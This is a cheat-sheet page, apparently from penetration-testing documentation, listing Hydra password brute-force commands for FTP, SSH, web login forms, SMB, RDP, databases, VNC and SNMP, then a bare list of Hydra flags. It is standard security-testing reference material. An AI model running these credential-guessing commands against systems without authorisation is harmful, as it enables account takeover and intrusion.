Documentation IndexFetch the complete documentation index at: /llms.txtUse this file to discover all available pages before exploring further.
Fetch the complete documentation index at: /llms.txt
Use this file to discover all available pages before exploring further.
Brute-force templates for common protocols ordered by port: FTP, SSH, HTTP, SMB, RDP, MySQL, and more.
hydra -L users.txt -P passwords.txt ftp://<IP>
hydra -l anonymous -p anonymous ftp://<IP>
hydra -L users.txt -P passwords.txt ssh://<IP>
hydra -L users.txt -P passwords.txt ssh://<IP> -s 2222
hydra -L users.txt -P passwords.txt smtp://<IP>
hydra -L users.txt -P passwords.txt <IP> http-post-form "/login:username=^USER^&password=^PASS^:Invalid login"
hydra -L users.txt -P passwords.txt <IP> http-get-form "/login.php?user=^USER^&pass=^PASS^:Invalid"
hydra -L users.txt -P passwords.txt <IP> http-get /
hydra -L users.txt -P passwords.txt pop3://<IP>
hydra -L users.txt -P passwords.txt smb://<IP>
hydra -L users.txt -P passwords.txt smb://<IP> -m WORKGROUP
hydra -L users.txt -P passwords.txt imap://<IP>
hydra -L users.txt -P passwords.txt <IP> https-post-form "/login:username=^USER^&password=^PASS^:Invalid login"
hydra -L users.txt -P passwords.txt <IP> https-get-form "/login.php?user=^USER^&pass=^PASS^:Invalid"
hydra -L users.txt -P passwords.txt mysql://<IP>
hydra -L users.txt -P passwords.txt rdp://<IP>
hydra -L users.txt -P passwords.txt rdp://<IP> -m DOMAIN
hydra -L users.txt -P passwords.txt postgres://<IP>
hydra -P passwords.txt vnc://<IP>
hydra -P community.txt snmp://<IP>
-l
-l admin
-L
-L users.txt
-p
-p password123
-P
-P rockyou.txt
-C
-C creds.txt
username:password
-u
-e nsr
-t
-t 16
-s
-s 2222
-S
-v
-V
-f
-o
-o found.txt
-R
-I
-w
-w 5
-W
-W 1
-M
-M targets.txt
-m
-U
hydra -U ssh